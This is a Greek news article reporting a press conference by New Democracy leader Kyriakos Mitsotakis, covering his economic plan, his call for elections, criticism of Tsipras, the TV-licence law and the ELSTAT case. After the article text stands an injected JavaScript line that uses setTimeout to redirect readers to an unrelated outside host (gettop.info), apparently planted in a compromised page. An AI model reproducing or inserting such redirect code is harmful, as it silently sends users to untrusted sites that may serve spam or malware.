Κυρ. Μητσοτάκης: Τεράστια ζημιά από την παραμονή Τσίπρα στην εξουσία (ΒΙΝΤΕΟ)

0
10

 

«Πρότεινα ένα διαφορετικό μείγμα οικονομικής πολιτικής κοστολόγησα το ύψος του οικονομικού προγράμματος, κατά συνέπεια το σχέδιο που προτείναμε είναι απολύτως εφαρμόσιμο«, τόνισε ο Κυριάκος Μητσοτάκης απαντώντας σε ερώτηση σχετικά με την χθεσινοβραδινή ομιλία του στη ΔΕΘ, στο πλαίσιο της συνέντευξης Τύπου που δίνει αυτή την ώρα.

«Είπα όμως ότι αυτό θα γίνει υπό την προϋπόθεση να διαπραγματευτούμε με τους εταίρους το ύψος των πλεονασμάτων. Πιστεύουμε ότι μπορούμε γιατί είμαστε αξιόπιστοι. Μπορούμε να τους πείσουμε«, πρόσθεσε.

Ο πρόεδρος της ΝΔ επανέλαβε το αίτημά του για εκλογές λέγοντας χαρακτηριστικά «ζητούμε εκλογές επιτακτικά, γιατί η σημερινή κυβέρνηση είναι επικίνδυνη για τον τόπο, όχι μόνο σε ό,τι αφορά τα της οικονομίας, αλλά γιατί υπονομεύει και τους ίδιους τους δημοκρατικούς μας θεσμούς – Τεράστια η ζημιά που κάνει η παραμονή του κ. Τσίπρα στην εξουσία«.

Αναφορικά με τις τηλεοπτικές άδειες ο κ. Μητσοτάκης σημείωσε ότι ο «διαγωνισμός έχει ήδη απαξιωθεί στα μάτια των Ελλήνων πολιτών» προσθέτοντας ότι ο «νόμος Παππάς είναι αντισυνταγματικός». »   Επί ημερών μας δεν πρόκειται να υπάρχει αριθμητικός περιορισμός στα κανάλια στη χώρα», σημείωσε χαρακτηριστικά.

«Το θέμα του κ. Γεωργίου είναι στη δικαιοσύνη, δεν θα κάνω κάποιο σχόλιο», είπε ο Κ. Μητσοτάκης ερωτηθείς για την υπόθεση των στοιχείων της ΕΛΣΤΑΤ. Ο κ. Μητσοτάκης υπενθύμισε πως το 2009 ο Κώστας Καραμανλής ζητούσε εθνική συνεννόηση, λίγο καιρό μετά ο Γιώργος Παπανδρέου κέρδιζε τις εκλογές με το «λεφτά υπάρχουν», ωστόσο 8 μήνες μετά μπήκαμε στο πρώτο πρόγραμμα.

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here